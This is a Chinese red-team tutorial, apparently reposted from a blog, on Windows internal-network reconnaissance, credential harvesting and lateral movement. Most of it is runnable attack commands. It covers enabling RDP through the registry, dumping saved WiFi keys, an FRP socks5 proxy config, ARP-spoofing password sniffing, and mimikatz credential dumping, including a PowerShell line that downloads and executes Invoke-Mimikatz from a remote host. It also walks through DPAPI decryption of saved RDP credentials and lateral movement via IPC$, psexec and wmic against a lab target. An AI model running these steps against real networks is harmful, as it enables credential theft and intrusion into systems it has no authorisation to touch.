4.内网信息收集(补充)
作者:互联网
0x01. 内网机器信息收集
1. 内网信息收集
内网是分布在一个区域性的网络,也称之为局域网,针对于内网不公开于互联网之上,内网分为好几种类型,有服务器内网、办公区域内网等等,内网可以方便的传输,以及可以保证其数据的安全,其资产不亚于暴露外网的资产多,内网信息收集也是非常重要的。
作为红队来讲,突破内网的前提下就是针对于内网的信息收集,内网的资产分布式很广,不仅是WEB,甚至开放了各种危险端口,在内网中机器不保证其开防火墙,所以我们可以任由横穿,假设内网机器大量没有打补丁的ms17010漏洞,我们就可以横穿其内网了。
再一方面,即使内网很安全,当我们收集到密码之后去撞库,测试一下密码是否被重复使用,也可以实现攻破其他主机。
2. 内网信息收集隐蔽
在收集内网信息的前提下,我们需要针对管理员的登录时间进行查看
net user administrator // 查看最后登录时间
wevtutil epl security C:\System_log.evtx // 保存所有日志信息 , 需要管理员权限
举例 : 使用物理机 , 远程链接靶机 , 然后在靶机上执行导出日志 , 打开日志查看是否有远程登录信息
看到了刚才远程链接电脑的IP地址啦
0x02. 内网信息收集命令
1. 内网本机信息收集命令-1
ipconfig /all 查询本机IP信息是否多网卡
net user 查看本机有几个账户
query user 查看在线的用户
tasklist /v 显示所有运行的进程
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" 查询系统版本
systeminfo 查看补丁信息
net share 查看共享信息
netsh firewall show config 查看防火墙信息
net statistics workstation 查看开机时间
补充 :finsubnet(Mac).py 发现内网具有两张网卡的主机
python27 finsubnet(Mac).py -i 192.168.1.1-192.168.1.254
2. 内网本机信息收集命令-2
wmic product get name,version 查看安装软件
net session 查看会话
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 开启rdp
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 查看rdp对应的端口
net config workstation 查看是否存在域环境
netsh wlan show profiles 查看链接过的wifi
netsh wlan show profiles name="WiFi名称" key=clear命令 查看具体wifi密码
3. RDP连接历史记录
针对某些服务器/个人PC场景,我们可以使用以下命令查看连接过的记录。
注意:是查看当前主机都用远程链接链接过那些主机
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
4. 针对内网主机提权
使用命令 : systeminfo
将信息复制到即可自动寻找提权exp
http://bugs.hacking8.com/tiquan/
5. 内网资产的脆弱性
漏洞危害(CVE)
敏感信息泄露
服务弱口令
历史密码
浏览器记录
连接历史记录 (xshell等等)
0x03. 内网主机探测及扫描
1. 内网穿透–流量代理
流量代理出网是将目标机器的内网代理出自己的机子,之后再进行扫描,一般代理出网的代理大部分都socks5、socks4,流量代理的工具有很多,个人感觉最好的还是Frp比较稳定。
内网流量转发
#frpc.ini
[common]
server_addr = 0.0.0.0
server_port = 7000
[socks_proxy]
type = tcp
remote_port = 6554
plugin = socks5
2. 内网区域大小探测
我们可以通过arp /a来观察网段的总体情况
私有IP地址有10段、172段、192段,大小 : 从大到小排序的
A类地址
10.0.0.0--10.255.255.255
B类地址
172.16.0.0--172.31.255.255
C类地址
192.168.0.0--192.168.255.255
3. 内网主机存活检测
存活检测,可以使用批量Ping的方式或者使用其他工具软件,也可以将流量代理出来进行扫描
使用NMAP或者其他方式进行检测
当流量代理出来,我们可以使用 proxychains 去调用 nmap 进行对目标内网进行扫描
4. NTSCAN
NTSCAN是比较老的一款工具了,但是他的实用价值非常高,可以直接爆破内网内的主机
先设置账号密码字典
5. 内网弱口令检测
在内网中必定充斥着大量的弱口令服务,所以我们可以对其弱口令进行探测
使用工具:超级弱口令检查工具
6. 脆弱性WEB资产扫描
我们可以使用WebAliveScan对其内网进行脆弱性WEB资产扫描,首先我们收集存活的内网IP之后对其扫描。
地址: https:/lgithub.com/cangqingzhe/WebAliveScan
安装 pip3 install -r requirements.txt
使用 :
python3 webscan.py --target target.txt --port 80
python3 webscan.py --target target.txt --port large
7. 内网流量嗅探
这款工具可以嗅探到内网的流量,并且可以主动收集内网的密码,不过操作可能比较复夺这里我实操来演示
ARP欺骗 , 软件使用教程
然后欺骗我们的靶机119那个
然后靶机119 , 登录一个网站 , 这个站点是明文传输的 ,而且提交的字段在我们的字段字典中
返回攻击机查看 , 得到账号和密码
补充 :关于ARP欺骗之前的笔记有详细
0x04. 内网主机密码收集
1. mimikatz抓取本机密码
mimikatz是一款简单且好用的windows密码抓取神器,该软件可帮助用户一键抓取window密码,操作简单、使用方便。
在域渗透过程中另外一名老师会为大家讲解mimikatz的一些高级使用,这里只做简单介绍
进入到mimikatz目录(必须system权限)
mimikatz.exe // 启动工具
privilege::debug //提升权限
sekurlsa::logonpasswords //抓取密码
一条命令也可以
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
//powershell远程加载方式
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.156/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz
2. lazagne抓取密码
LaZagne是一款功能比较多的抓取密码工具,可以抓取windows、wifi、浏览器、数据库等密码。
下载地址: https://github.com/AlessandroZ/LaZagne/releases/tag/2.4.3
3. xshell密码抓取密码
在内网渗透中可能会发现连接ssh的相关信息,一般都是xshell程序,我们可以使用该程序来对xshell的密码进行破
解,安装以及生成exe的过程如下:
https://github.com/dzxs/Xdecrypt
4. SharpDecryptPwd密码抓取工具
SharpDecryptPwd是一款强大的密码解密工具,支持五种方式,包括native、teamviewer,filezilla、WinSCP、Xmanager。
https://github.com/uknowsec/SharpDecryptPwd
5. mimikatz获取rdp连接记录密码
注意:是获取当前主机链接过那些主机的3389记录
1.查找本地的Credentials (证书) , 靶机执行
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
2.使用mimikatz进行操作 (管理员权限运行)
mimikatz "privilege::debug" "dpapi::cred /in:C:\Users\jack\AppData\Local\Microsoft\Credentials\7AB721DA2E0FEE4E5461654D463F007B" "sekurlsa::dpapi" exit
jack是当前靶机的登录用户(x)
guidMasterkey是我们需要的
根据我们记录的guidMasterkey得到MasterKey(加密密钥)
* MasterKey : 3474791e200b87da22518dda8f043fa2ea4fc7d162562c94cdf835a70b6c0fb4e09fb465f5ac4f92d054bffe8b253ea12d3a5fc26bcce6f23a78689018e4c925
最后就差解密了,我这里面是 , 依然是在mimikatz中执行
dpapi::cred /in:C:\Users\jack\AppData\Local\Microsoft\Credentials\7AB721DA2E0FEE4E5461654D463F007B /masterkey:3474791e200b87da22518dda8f043fa2ea4fc7d162562c94cdf835a70b6c0fb4e09fb465f5ac4f92d054bffe8b253ea12d3a5fc26bcce6f23a78689018e4c925
参考链接 : https://blog.csdn.net/q1352483315/article/details/100075078
0x05. 内网横向渗透演示
1. IPC空连接概述
前提是已经获得了目标机器的账号和密码
IPC(Internet Process Connection)是共享"命名管道"的资源。
它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
IPC是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c,d,e....和系统自录winnt或windows(admin)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
2. 建立空连接命令
net share 查看本机共享
net use \\IP地址 "密码" /user:用户名 对其进行空连接
net use \\192.168.0.119\c$ "a" /user:"administrator"
net use \\IP地址 /del 删除空连接
net time \\lP地址 查看机器时间
首先在攻击机上用账号和密码进行空连接 , 然后文件管理中访问靶机的C盘
补充 : 如果不能访问可能是权限问题
3. PSEXEC横向工具
微软提供的一种远程命令行工具
可直接用于对远程主机进行命令交互
psexec.exe \\lP -u domainladministrator -p password command
psexec.exe \\192.168.0.119 -u administrator -p a cmd.exe
然后在靶机上查看
4. wmic横向
wmic是一款Windows自带的工具集,可以通过/node选项直接对远程过程调用RPD访问,允许直接执行命令。
wmic /node:192.168.0.119 /user:administrator /password:a # 连接后面拼接wmic命令
靶机ip
常见的vmic命令
process call create "cmd.exe" #启动某一程序
process call create "msg jack a"
process call create "cmd.exe /c echo > c:\1.txt”
process list brief #查看所有进程
标签:收集,查看,补充,主机,密码,mimikatz,net,内网 来源: https://www.cnblogs.com/xcymn/p/15721440.html